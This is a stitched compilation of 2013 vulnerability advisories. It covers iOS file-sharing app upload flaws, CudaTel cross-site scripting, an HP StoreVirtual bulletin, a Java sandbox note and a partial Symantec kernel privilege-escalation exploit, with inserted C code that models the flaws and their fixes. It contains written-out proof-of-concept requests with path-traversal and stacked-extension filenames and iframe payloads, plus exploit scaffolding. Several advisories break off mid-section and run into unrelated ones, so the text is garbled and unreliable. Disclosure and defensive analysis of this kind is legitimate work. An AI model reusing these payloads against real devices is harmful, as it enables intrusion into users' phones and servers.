WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities
Title:
======
WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities

Date:
=====
2013-07-15

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1011

VL-ID:
======
1011

Common Vulnerability Scoring System:
====================================
6.3

Introduction:
=============
It is the best solution for transferring photos, songs, documents, movies and other files between computer and your mobile devices over wireless network. Simply launch application on your iOS device and scan QR code from http://wifly.me to connect your phone. Drop your files into opened page and vice versa! No cloud or internet access required - no data leaves your local network. Both your devices must have access to the same LAN or WLAN - no additional network configurations needed. Transferred documents can be opened with any supported App on your iOS device.

Capabilities:
- Multiple uploads
- Easily Drag & Drop multiple files to WiFly
- Preview pictures in the browser
- Downloading the entire folder to your computer
- Browsing files and folders directly on mobile device
- Exchange files between mobile devices
- Built-in preview of images, documents, music and video files

(Copy of the Homepage: https://itunes.apple.com/us/app/wifly-pro/id641092695 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).

Report-Timeline:
================
2013-07-15: Public Disclosure (Vulnerability Laboratory)

Status:
=======
Published

Affected Products:
==================
Apple AppStore
Product: WiFly Pro 1.0

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A local file include and an arbitrary file upload web vulnerability have been detected in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone). Both vulnerabilities are located in the file upload module of the application's embedded web server (http://localhost:4885/) when it processes a manipulated filename submitted via POST. The uploaded file is afterwards accessible via the index listing module of the application.

Remote attackers can supply a filename with a double or triple extension in the POST request to bypass the upload validation and filter. After the upload, the attacker requests the file by one extension and then swaps it for another, so that for example PHP, JS or HTML code is served. The application's own filter disallows renaming a file to a name with special characters because of an input field restriction, so the manipulation has to happen in the upload request itself. Attackers need to request two different URLs: first the file as a URL that carries the filename in a parameter, which displays it, and second the upload of the file with the manipulated filename in the POST request. Exploitation requires no user interaction, but the victim's iOS device needs to accept the connection from the attacker's device. Successful exploitation results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):
                [+] WiFly Pro 1.0 - iTunes or AppStore (Apple)

Vulnerable Module(s):
                [+] Upload

Vulnerable File(s):
                [+] upload.json & add

Vulnerable Parameter(s):
                [+] filename

Affected Module(s):
                [+] Index Listing (http://localhost:4885/)

Proof of Concept:
=================
The local file/path include and arbitrary file upload vulnerability can be exploited by remote attackers without user interaction, but the connection needs to be accepted by the target system. For demonstration or reproduce ...

Standard Request:

Content-Disposition: form-data; name="files[]"; filename="s2.png"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\n

Status: 200
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=new-image23.png&sessionid=1373658611109
Load Flags[LOAD_BYPASS_CACHE ] Content Size[118] Mime Type[application/x-unknown-content-type]

PoC: 1.1 - File/Path Include Vulnerability

POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=../../[File/Path Include Vulnerability!].png&sessionid=1373658611109
POST_DATA[-27213192708057
Content-Disposition: form-data; name="files[]"; filename="../../[File/Path Include Vulnerability!]"
Content-Type: image/png

PoC: 1.2 - Arbitrary File Upload Vulnerability

POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=[Arbitrary File Upload Vulnerability!].png.gif.html.php.js&sessionid=1373658611109
POST_DATA[-27213192708057
Content-Disposition: form-data; name="files[]"; filename="[Arbitrary File Upload Vulnerability!].png.gif.html.php.js"
Content-Type: image/png

Solution:
=========
Flux Player v3.1.0 iOS - File Include Arbitrary File Upload Vulnerability
Title:
======
Flux Player v3.1.0 iOS - File Include & Arbitrary File Upload Vulnerability

Date:
=====
2013-07-16

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1013

VL-ID:
======
1013

Common Vulnerability Scoring System:
====================================
7.5

Introduction:
=============
With `Flux Player` you can use your iPhone, iPad or iPod touch for download, transfer and playback of movies, audio books and music. The movies may be transferred from commercial services, products or alternatively from yourself by drag-and-drop with the free `Flux Transfer` PC application.

(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/flux-player/id324300572 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a file include and an arbitrary file upload vulnerability in Flux Player 3.1.0 (Apple iOS - iPad & iPhone).

Report-Timeline:
================
2013-07-16: Public Disclosure (Vulnerability Laboratory)

Status:
=======
Published

Affected Products:
==================
Apple AppStore
Product: Flux Player - Application 3.1.0

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
1.1
A file include web vulnerability has been detected in the Flux Player 3.1.0 application (Apple iOS - iPad & iPhone). The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.

The vulnerability is located in the upload module when files with manipulated names are uploaded via POST. The attacker can inject local paths or files into the request context and compromise the device. The validation has a side effect that increases the risk: the attack can be combined with persistently injected script code.

Exploitation of the vulnerability requires no user interaction and no privileged Flux Player application user account. Successful exploitation results in unauthorized local file and path requests that compromise the device or application.

Vulnerable Module(s):
                [+] Upload (Files)

Vulnerable Parameter(s):
                [+] filename

Affected Module(s):
                [+] Index File Dir Listing

1.2
An arbitrary file upload web vulnerability has been detected in the Flux Player 3.1.0 application (Apple iOS - iPad & iPhone). The arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation and gain unauthorized access.

The vulnerability is located in the upload module when files with multiple stacked extensions are processed. Attackers are able to upload PHP or JS web shells by renaming the file with multiple extensions, for example picture.jpg.js.php.jpg. After the upload, the attacker drops the trailing .jpg from the request to access the malicious file (web shell) without authorization and compromise the web server or mobile device.

Exploitation of the vulnerability requires no user interaction and no privileged Flux Player application user account. Successful exploitation results in unauthorized file access and a compromise via the uploaded web shell.

Vulnerable Module(s):
                [+] Upload (Files)

Vulnerable Parameter(s):
                [+] filename (multiple extensions)

Affected Module(s):
                [+] Index File Dir Listing

Proof of Concept:
=================
The local file include and arbitrary file upload vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction. For demonstration or reproduce ...

1.1
--- Request Session Log 1 - Local File Include ---
Status: 200[OK]
POST http://localhost:8080/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[1053] Mime Type[application/x-unknown-content-type]
Request Headers:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      DNT[1]
      Referer[http://localhost:8080/]
      Connection[keep-alive]
Post Data:
      POST_DATA[-21961286324572
Content-Disposition: form-data; name="file"; filename="<iframe src=a><iframe src=var/app/Mobile>"
Content-Type: image/png
-
--
Status: 200[OK]
GET http://localhost:8080/../var/app/Mobile [Included File/Path as Filename!]
Load Flags[LOAD_DOCUMENT_URI ] Content Size[669] Mime Type[application/x-unknown-content-type]
Request Headers:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      Accept
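Both the WiFly and the Flux Player advisories above describe the same two filter failures: a path in the multipart filename is written through, and a name with stacked extensions (s2.png.gif.html.php.js, picture.jpg.js.php.jpg) passes because an allowed extension appears somewhere in it. The following is an added example, not code from either app or from Vulnerability Lab: it models a weak "allowed extension appears anywhere" check next to a strict check (bare name, single extension, allow-listed), plus a content check on the stored bytes. The allow-list and the exact shape of the vendors' weak filter are assumptions; the bypass filenames come from the advisories.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed allow-list for an image upload endpoint (not from the advisories). */
static const char *const ALLOWED_EXT[] = { "png", "gif", "jpg", "jpeg", NULL };

static char lower(char c) { return (c >= 'A' && c <= 'Z') ? (char)(c + 32) : c; }

/* Lower-cased copy of name into out; 0 if empty or too long for out. */
static int lower_copy(const char *name, char *out, size_t outsz) {
    size_t n = strlen(name);
    if (n == 0 || n >= outsz) return 0;
    for (size_t i = 0; i <= n; i++) out[i] = lower(name[i]);
    return 1;
}

/* Weak check (assumed model of the bypassed filter): accept if any allowed
 * extension appears anywhere in the name.  Both "../../x.png" and
 * "shell.png.gif.html.php.js" pass, which is exactly what the PoCs exploit. */
int weak_upload_name_ok(const char *name) {
    char buf[256];
    if (!lower_copy(name, buf, sizeof buf)) return 0;
    for (size_t i = 0; ALLOWED_EXT[i]; i++) {
        char pat[16];
        snprintf(pat, sizeof pat, ".%s", ALLOWED_EXT[i]);
        if (strstr(buf, pat)) return 1;
    }
    return 0;
}

/* Strict check: a bare file name of [a-z0-9_-] with exactly one dot, a
 * non-empty stem and an allow-listed extension.  Path separators, "..",
 * leading dots and stacked extensions are rejected by construction, so the
 * served file can only ever carry the single extension it was stored under. */
int strict_upload_name_ok(const char *name) {
    char buf[256];
    if (!lower_copy(name, buf, sizeof buf)) return 0;
    const char *dot = NULL;
    for (const char *p = buf; *p; p++) {
        if (*p == '.') {
            if (dot || p == buf) return 0;          /* second dot, or leading dot */
            dot = p;
        } else if (!((*p >= 'a' && *p <= 'z') || (*p >= '0' && *p <= '9') ||
                     *p == '_' || *p == '-')) {
            return 0;                               /* '/', '\\', spaces, anything else */
        }
    }
    if (!dot || dot[1] == '\0') return 0;          /* no extension */
    for (size_t i = 0; ALLOWED_EXT[i]; i++)
        if (strcmp(dot + 1, ALLOWED_EXT[i]) == 0) return 1;
    return 0;
}

/* Second line of defence: the stored bytes must match what the extension
 * claims, so an HTML/JS payload named like an image is refused as well. */
int content_matches_ext(const char *name, const unsigned char *data, size_t len) {
    static const unsigned char png_sig[8] = { 0x89, 'P', 'N', 'G', '\r', '\n', 0x1a, '\n' };
    char buf[256];
    if (!strict_upload_name_ok(name) || !lower_copy(name, buf, sizeof buf)) return 0;
    const char *ext = strrchr(buf, '.') + 1;        /* strict check guarantees a dot */
    if (strcmp(ext, "png") == 0) return len >= 8 && memcmp(data, png_sig, 8) == 0;
    if (strcmp(ext, "gif") == 0)
        return len >= 6 && (memcmp(data, "GIF87a", 6) == 0 || memcmp(data, "GIF89a", 6) == 0);
    return len >= 3 && data[0] == 0xFF && data[1] == 0xD8 && data[2] == 0xFF;   /* jpg/jpeg */
}

int main(void) {
    /* Constructed sample names: one legitimate, three taken from the PoCs. */
    const char *samples[] = { "s2.png", "../../etc/passwd.png",
                              "shell.png.gif.html.php.js", "picture.jpg.js.php.jpg" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-28s weak=%d strict=%d\n", samples[i],
               weak_upload_name_ok(samples[i]), strict_upload_name_ok(samples[i]));
    return 0;
}
```

The strict check deliberately normalises and rejects rather than "cleaning" the name: stripping `..` or extra extensions and keeping the rest is what produces the second-pass bypasses the advisories describe. Storing the file under a server-generated name and serving it with a Content-Type derived from the validated extension closes the "request it with the other extension" step entirely.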
Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities (Bug Bounty #17)
Title:
======
Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities (Bug Bounty #17)

Date:
=====
2013-07-17

References:
===========
http://vulnerability-lab.com/get_content.php?id=779

BARRACUDA NETWORK SECURITY ID: BNSEC-815

VL-ID:
======
779

Common Vulnerability Scoring System:
====================================
2.5

Introduction:
=============
Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server's enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks.

Powerful, Complete Solution
With an expansive feature set and no per-user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.cudatel.com )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple client-side web vulnerabilities in the Barracuda Networks CudaTel v2.6.002.040 appliance application.

Report-Timeline:
================
2012-11-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-29: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2012-12-01: Vendor Response/Feedback (Barracuda Networks Security Team)
2013-04-07: Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: Dave Farrow]
2013-07-17: Public Disclosure (Vulnerability Laboratory)

Status:
=======
Published

Affected Products:
==================
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple client-side input validation vulnerabilities have been detected in the Barracuda Networks CudaTel v2.6.002.040 appliance application. The non-persistent vulnerabilities allow a remote attacker to manipulate client-side application requests in the browser.

The first vulnerability (client-side) is located in the GUI route module when processing requests to the vulnerable bbx_outbound_route_name listing. The route module allows remote attackers to inject script code via the bbx_outbound_route_flag_locked parameter, which is then executed in the bbx_outbound_route_name listing.

The second vulnerability (client-side) is located in the ajax - html module when processing requests to the vulnerable queues_wall_stub file with the ops and opOpenQueueWallboard link parameters. The vulnerability allows remote attackers to change the link of the Queue Monitor Board so that requests are redirected.

The third vulnerability (client-side) is located in the exception handling of the eventlog module for failed Web login attempts, when the manipulated bbx_eventlog_message parameter is loaded. The vulnerability allows remote attackers to execute their own script code (client-side) in the queues_wall_stub.html file from the exception-handling location for failed Web login attempts.

Exploitation of the vulnerabilities requires a low-privilege application user account and medium or high user interaction. Successful exploitation results in client-side phishing, client-side session hijacking, client-side external redirects to malware or evil websites and client-side manipulation of module context.

Vulnerable Section(s):
                [+] GUI - ROUTE
                [+] AJAX - HTML
                [+] Eventlog

Vulnerable Module(s):
                [+] route - Listing
                [+] queues_wall_stub - Monitor Queue Link
                [+] eventlog - Web login attempt fail (Exception Handling) - Listing

Vulnerable Parameter(s):
                [+] bbx_outbound_route_flag_locked & bbx_outbound_route_name
                [+] ops & opOpenQueueWallboard
                [+] bbx_eventlog_message

Proof of Concept:
=================
The client-side input validation vulnerabilities can be exploited by remote attackers without a required application user account and with medium or high user interaction. For demonstration or reproduce ...

1.1
Review: GUI - ROUTE > route - Listing > bbx_outbound_route_flag_locked [PARAMETER] > bbx_outbound_route_name [LISTING]

- bbx_domain_id: 6
  bbx_outbound_route_flag_locked: 0
  bbx_outbound_route_id: 14
[security bulletin] HPSBST02896 rev.2 - HP StoreVirtual Storage, Remote Unauthorized Access
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03825537

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03825537
Version: 2

HPSBST02896 rev.2 - HP StoreVirtual Storage, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2013-07-17
Last Updated: 2013-07-17

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP StoreVirtual Storage. This vulnerability could be remotely exploited to gain unauthorized access to the device.

All HP StoreVirtual Storage systems are equipped with a mechanism that allows HP support to access the underlying operating system if permission and access is provided by the customer. This functionality cannot be disabled today.

HP StoreVirtual products are storage appliances that use a custom operating system, LeftHand OS, which is not accessible to the end user. Limited access is available to the user via the HP StoreVirtual Command-Line Interface (CLiQ); however, root access is blocked. Root access may be requested by HP Support in some cases to help customers resolve complex support issues. To facilitate these cases, a challenge-response-based one-time password utility is employed by HP Support to gain root access to systems when the customer has granted permission and network access to the system. The one-time password utility protects the root access by preventing repeated access to the system with the same pass phrase.

Root access to the LeftHand OS does not provide access to the user data being stored on the system.

References: CVE-2013-2352 (SSRT101257)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

This issue affects LeftHand OS (a.k.a. SAN iQ) software versions 10.5 and earlier.

HP StoreVirtual devices:
  HP P4300
  HP P4500
  HP P4300 G2
  HP P4500 G2
  HP P4800 G2
  HP P4900 G2
  HP P4000 VSA
  HP StoreVirtual 4130
  HP StoreVirtual 4330
  HP StoreVirtual 4530
  HP StoreVirtual 4630
  HP StoreVirtual 4730
  HP StoreVirtual VSA
  LeftHand NSM2060
  LeftHand NSM2120
  Dell PowerEdge 2950
  HP DL320S
  IBM System x3650
  LeftHand NSM2060 G2
  LeftHand NSM2120 G2
  LeftHand VSA

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference         Base Vector                  Base Score
  CVE-2013-2352     (AV:N/AC:L/Au:N/C:N/I:C/A:C)    9.4
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Joshua Small for reporting this issue to security-al...@hp.com

RESOLUTION

HP has provided patches to resolve this vulnerability. Please see the table below to determine which patch applies to the StoreVirtual version being used.

  OS Version                                          Patch
  HP LeftHand OS version 10.5                         10152-00
  HP LeftHand OS version 10.0                         10151-00
  HP P4000 SAN/iQ software versions 9.5 and 9.5.01    25051-00

Note: Systems running HP P4000 SAN/iQ version 9.5.x must install 9.5 Patch Set 05 before applying patch 25051-00. Installation of patch 25051-00 will fail if 9.5 Patch Set 05 is not present.

Note: HP Support may still request root access to customer systems in order to resolve certain support issues.

Patches and release notes may be downloaded using the 9.5 or later CMC.

1. Go to http://www.hp.com/go/hpsc
2. Select your specific product. One method to do this is as follows:
   a. Under Browse all HP products, select 'Storage'
   b. Select 'Disk Storage Systems'
   c. Select 'StoreVirtual Storage'
   d. Select 'HP StoreVirtual 4000/LeftHand P4000 Storage'
      If you have a HP LeftHand VSA, HP LeftHand P4300 or HP LeftHand P4500 product, select 'HP LeftHand P4000 SAN Solutions'.
      If you have a HP P4x00 G2 or HP StoreVirtual 4000 product, select 'HP StoreVirtual 4000 Storage'.
   e. Select 'Drivers, Software & Firmware' under 'Download Options' in the left menu.
   f. Select your specific product.
   g. Select your language.
   h. Click 'Cross operating system (BIOS, Firmware, Diagnostics, etc.)'
   i. Click 'Patch' or scroll down to the Patch table
   j. In the Description column of the Patch table, click the title of the patch:
      To download the file, click the 'Download' button.
      To read the release notes, click the 'Release Notes' tab.

HISTORY
Version:1 (rev.1) - 9 July 2013 Initial release
Version:2 (rev.2) - 17 July 2013 Documented the released patches, added LeftHand NSM2120

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support
[SE-2012-01] New Reflection API affected by a known 10+ years old attack
Hello All,

We discovered yet another indication that the new Reflection API introduced into Java SE 7 was not subject to a thorough security review (if any).

A new vulnerability (Issue 69) that was submitted to Oracle today makes it possible to implement a very classic attack against Java VM. What's in particular interesting is that the attack itself has been in the public knowledge for at least 10+ years [1]. It's one of those risks one should protect against in the first place when new features are added to Java at the core VM level. The more surprising it is to discover that the Reflection API introduced to Java SE 7 didn't implement proper protection against this attack.

Our Proof of Concept code for Issue 69 was confirmed to work with flying colors under Java SE 7 Update 25 (1.7.0_25-b16) and below. The code allows one to violate a fundamental feature of Java VM security - the safety of its type system. As a result, a complete and reliable Java security sandbox bypass can be gained on a vulnerable instance of Oracle's Java SE software.

Oracle's blog post published on May 30, 2013 [2] implies that maintaining the security-worthiness of Java has been Oracle's priority following the acquisition of Sun Microsystems. Oracle's VP goes even further by indicating that acquired product lines [such as Java SE] were required to conform to Oracle policies and procedures, including those comprising Oracle Software Security Assurance [3].

If Oracle had any Software Security Assurance procedures adopted for Java SE, most of the simple Reflection API flaws along with a known, 10+ years old attack should have been eliminated prior to the Java SE 7 release. This didn't happen, thus it is reasonable to assume that Oracle's security policies and procedures are either not worth much or their implementation is far from perfect.

That thought alone should catch the attention of Oracle customers not necessarily relying on Java SE, but rather on other Oracle products, which were likely subject to the very same, questionable Software Security Assurance policies and procedures as Java SE 7.

--

As for other things, we released technical details and Proof of Concept code for a previously reported security vulnerability (Issue 61) that got fixed by Oracle's Java SE CPU in Jun 2013:

http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf
http://www.security-explorations.com/materials/se-2012-01-61.zip

We also released technical details and Proof of Concept code for several (9 in total) IBM Java flaws that were addressed by the company in early Jul 2013:

http://www.security-explorations.com/materials/SE-2012-01-IBM-2.pdf
http://www.security-explorations.com/materials/se-2012-01-62-68.zip

The above includes details of trivially broken fixes for vulnerabilities reported to IBM in Sep 2012 (Issues 35-37 and 49). One of the issues is also a nice illustration of the allowed behavior (Issue 54) for Java VM implementations other than Oracle's.

Finally, we published information (and some comment) about CVE numbers assigned by Oracle to vulnerabilities reported by Security Explorations as part of the SE-2012-01 project:

http://www.security-explorations.com/materials/SE-2012-01-CVE_Map.pdf

Thank you.

Best Regards
Adam Gowdiak

--
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"

--

References:
[1] Java and Java VM security vulnerabilities and their exploitation techniques, Last Stage of Delirium Research Group, http://lsd-pl.net/
[2] Maintaining the security-worthiness of Java is Oracle's priority, https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of
[3] Oracle Software Security Assurance, http://www.oracle.com/us/support/assurance/overview/index.html
Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit
# Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit
# Date: 2013-7-17
# Author : MJ0011
# Version: Symantec Workspace Virtualization 6.4.1895.0
# Tested on: Windows XP SP3

DETAILS:

In the fslx.sys hook of NtQueryValueKey, the driver writes directly to the buffer pointed to by the caller-supplied ResultLength argument without any check.

EXPLOIT CODE:

#include "stdafx.h"      /* MSVC precompiled header; drop this line outside Visual Studio */
#include <windows.h>
#include <malloc.h>

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;

typedef LONG (WINAPI *pNtQueryValueKey)(
    HANDLE          KeyHandle,
    PUNICODE_STRING ValueName,
    ULONG           KeyValueInformationClass,
    PVOID           KeyValueInformation,
    ULONG           Length,
    PULONG          ResultLength          /* the pointer fslx.sys writes through unchecked */
);

typedef LONG (WINAPI *pNtQueryIntervalProfile)(
    ULONG  ProfileSource,
    PULONG Interval
);

typedef LONG (WINAPI *pZwQuerySystemInformation)(
    ULONG  SystemInformationClass,
    PVOID  SystemInformation,
    ULONG  SystemInformationLength,
    PULONG ReturnLength
);

/* NTSTATUS returned while the supplied buffer is still too small. */
#define STATUS_INFO_LENGTH_MISMATCH ((LONG)0xC0000004L)

/* Query a SystemInformation table, doubling the buffer until it fits. */
PVOID GetInfoTable(ULONG ATableType)
{
    ULONG  mSize = 0x4000;
    PVOID  mPtr  = NULL;
    LONG   status;
    HMODULE hlib = GetModuleHandle(TEXT("ntdll.dll"));
    pZwQuerySystemInformation ZwQuerySystemInformation =
        (pZwQuerySystemInformation)GetProcAddress(hlib, "ZwQuerySystemInformation");

    do {
        mPtr = malloc(mSize);
        if (mPtr) {
            status = ZwQuerySystemInformation(ATableType, mPtr, mSize, 0);
        } else {
            return NULL;
        }
        if (status == STATUS_INFO_LENGTH_MISMATCH) {
            free(mPtr);
            mSize = mSize * 2;
        }
    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    if (status == 0) {
        return mPtr;
    }
    free(mPtr);
    return NULL;
}

enum {
    SystemModuleInformation = 11,
    SystemHandleInformation = 16
};

typedef struct {
    ULONG  Unknown1;
    ULONG  Unknown2;
    PVOID  Base;
    ULONG  Size;
    ULONG  Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR   ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

/* Boot video (Inbv*) kernel routines, used to paint the result on the console
 * once code runs in ring 0. */
typedef VOID    (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID    (WINAPI *PINBV_SOLID_COLOR_FILL)(ULONG x1, ULONG y1, ULONG x2, ULONG y2, ULONG color);
typedef ULONG   (WINAPI *PINBV_SET_TEXT_COLOR)(ULONG Color);
typedef VOID    (*INBV_DISPLAY_STRING_FILTER)(PUCHAR *Str);
typedef VOID    (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(INBV_DISPLAY_STRING_FILTER DisplayStringFilter);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(BOOLEAN bEnable);
typedef VOID    (WINAPI *PINVB_SET_SCROLL_REGION)(ULONG x1, ULONG y1, ULONG x2, ULONG y2);
typedef VOID    (WINAPI *PINBV_DISPLAY_STRING)(PUCHAR Str);

PINBV_ACQUIRE_DISPLAY_OWNERSHIP     InbvAcquireDisplayOwnership     = 0;
PINBV_RESET_DISPLAY                 InbvResetDisplay                = 0;
PINBV_SOLID_COLOR_FILL              InbvSolidColorFill              = 0;
PINBV_SET_TEXT_COLOR                InbvSetTextColor                = 0;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter  = 0;
PINBV_ENABLE_DISPLAY_STRING         InbvEnableDisplayString         = 0;
PINVB_SET_SCROLL_REGION             InbvSetScrollRegion             = 0;
PINBV_DISPLAY_STRING                InbvDisplayString               = 0;

#define VGA_COLOR_BLACK             0
#define VGA_COLOR_RED               1
#define VGA_COLOR_GREEN             2
#define VGA_COLOR_GR                3
#define VGA_COLOR_BULE              4
#define VGA_COLOR_DARK_MEGAENTA     5
#define VGA_COLOR_TURQUOISE         6
#define VGA_COLOR_GRAY              7
#define VGA_COLOR_BRIGHT_GRAY       8
#define VGA_COLOR_BRIGHT_RED        9
#define VGA_COLOR_BRIGHT_GREEN      10
#define VGA_COLOR_BRIGHT_YELLOW     11
#define VGA_COLOR_BRIGHT_BULE       12
#define VGA_COLOR_BRIGHT_PURPLE     13
#define VGA_COLOR_BRIGHT_TURQUOISE  14
#define VGA_COLOR_WHITE             15

UCHAR DisplayString[] =
    "= EXPLOIT SUCCESSFULLY\n"
    " Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit\n"
    " VULNERABLE";
/* (the posted source ends here) */
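The one-line DETAILS above is the whole bug: a kernel hook stores a value through an output pointer that a user-mode caller chose, so the caller can aim it at any kernel address. The following is an added example, not code from the exploit or from fslx.sys: a user-mode model that shows the unchecked hook beside one that applies the check a Windows driver gets from ProbeForWrite when the request came from user mode. Fake addresses are resolved into two small arrays standing in for user and kernel memory; MM_USER_PROBE_ADDRESS and the status codes are the 32-bit Windows values, and every other address and size here is constructed for the model.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MM_USER_PROBE_ADDRESS   0x7FFF0000u   /* 32-bit Windows user/kernel split */
#define STATUS_SUCCESS          0x00000000u
#define STATUS_ACCESS_VIOLATION 0xC0000005u

typedef enum { KernelMode = 0, UserMode = 1 } KPROCESSOR_MODE;

/* Constructed model of memory: one user page the attacker owns and one kernel
 * region (think of a dispatch table entry or a token field). */
#define USER_BASE   0x00400000u
#define KERNEL_BASE 0x80000000u
#define ARENA_SIZE  0x100u

static uint8_t user_mem[ARENA_SIZE];
static uint8_t kernel_mem[ARENA_SIZE];

void model_reset(void) {
    memset(user_mem, 0, sizeof user_mem);
    memset(kernel_mem, 0, sizeof kernel_mem);
}

/* Map a fake address to backing storage for a 4-byte access; NULL if unmapped. */
static uint8_t *resolve(uintptr_t addr) {
    if (addr >= USER_BASE && addr + 4 <= USER_BASE + ARENA_SIZE)
        return user_mem + (addr - USER_BASE);
    if (addr >= KERNEL_BASE && addr + 4 <= KERNEL_BASE + ARENA_SIZE)
        return kernel_mem + (addr - KERNEL_BASE);
    return NULL;
}

uint32_t read32(uintptr_t addr) {
    uint32_t v = 0;
    uint8_t *p = resolve(addr);
    if (p) memcpy(&v, p, sizeof v);
    return v;
}

static int write32(uintptr_t addr, uint32_t val) {
    uint8_t *p = resolve(addr);
    if (!p) return 0;
    memcpy(p, &val, sizeof val);
    return 1;
}

/* What ProbeForWrite(ResultLength, sizeof(ULONG), sizeof(ULONG)) enforces:
 * the pointer is aligned and the whole object lies below the user boundary. */
static int probe_for_write_u32(uintptr_t addr) {
    return addr % 4 == 0 && addr + 4 <= MM_USER_PROBE_ADDRESS;
}

/* Vulnerable hook: after the real query it stores the needed length through
 * whatever pointer the caller passed.  A user-mode caller passing a kernel
 * address gets a controlled 4-byte write into kernel memory. */
uint32_t hook_vulnerable(uintptr_t ResultLength, uint32_t needed) {
    write32(ResultLength, needed);
    return STATUS_SUCCESS;
}

/* Hardened hook: if the request originated in user mode the output pointer is
 * probed before use; kernel-mode callers keep passing kernel pointers. */
uint32_t hook_hardened(KPROCESSOR_MODE PreviousMode, uintptr_t ResultLength, uint32_t needed) {
    if (PreviousMode == UserMode && !probe_for_write_u32(ResultLength))
        return STATUS_ACCESS_VIOLATION;
    if (!write32(ResultLength, needed))
        return STATUS_ACCESS_VIOLATION;   /* the __except path in a real driver */
    return STATUS_SUCCESS;
}

int main(void) {
    model_reset();
    hook_vulnerable(KERNEL_BASE, 0x1000u);
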